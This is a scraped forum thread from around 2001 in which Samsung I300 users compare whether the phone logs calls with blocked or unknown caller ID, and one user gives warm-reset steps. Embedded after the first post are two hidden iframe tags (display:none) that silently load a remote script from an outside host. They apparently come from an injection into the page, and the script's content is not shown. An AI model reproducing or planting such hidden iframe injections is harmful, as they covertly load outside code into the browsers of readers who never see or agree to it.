+ Reply to Thread

Thread: Missed Calls?

Missed Calls?

I just missed a few calls from someone without caller ID, and they don't show up in my missed calls list. That seems quite broken.

Is that really normal behavior?

-Patti<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have the same experience, which seems absurd to me as well. What's more I just a moment ago answered a call with no caller id information. It doesn't show up in my "incoming" list either, which is *really* ridiculous. Granted, you can't phone back, but that's no reason to keep no record of it at all. I've never had a phone that worked that way before.

It's a Samsungian thing

Our 3500s and 8500s work similarly. Calls from an unknown source aren't registered.

There may be a patch for that, but I haven't seen it.
    The older I get, the better I was...

My I300 sometimes does not log calls with ID but that are not stored in my address book (new numbers). I must admit however, not a single motorola startac/timeport model (which I have been using for the last year) can log calls from the same number as different entries so that you can track how many times the same person called. I like that feature the I300 has.

Administrator

Arrow

if i get a unknown or private call, it will be tracked in the "missed" list.

curious...

someone on another post said their data calls were not being logged in the outgoing list.. does this happen to you folks who are not seeing the missed calls showing up in your mised calls list?
    Last edited by Marctronixx; 12-28-2001 at 05:20 PM.

Now this thread and the thread Marc is referring to are both entertaining. I have the same version software as Marc and still, our I300s perform differently.

I was very pleased with the I300 when I learned that, unlike my previous Samsungs, this one DID log calls that were received or missed as "unknown" in my respective call logs. Haven't a clue why two supposedly identical operating systems would function differently in this regard. Should be a standard.

With previous phones, outgoing, incoming, and missed calls were only displayed once in the log. Thus if my girlfriend called me 4 times, only the last appeared. My I300 records all of them. Do any of yours differ in this respect?

Originally posted by mjorange
    With previous phones, outgoing, incoming, and missed calls were only displayed once in the log. Thus if my girlfriend called me 4 times, only the last appeared. My I300 records all of them. Do any of yours differ in this respect?
    my I300 also behaves in the manner described above.

my I300 does not log calls with blocked caller ID, i just checked. I have a feeling that has to do with the missing data call entries in the outgoing list, and also, with the unsuccessful warm reset situation I am experiencing.

mjorange: try warm resetting your phone by holding down the reset button, then hold down the up botton on the front of the phone, then release the reset button and then release the up button. then go to your "Prefs" and then to "Netowork" and reply back as to what your experience is. If no messages come up, make a call to your I300 with the call ID blocked and see if it logs into the missed calls list.
    Last edited by Stillen_I30; 12-28-2001 at 09:11 PM.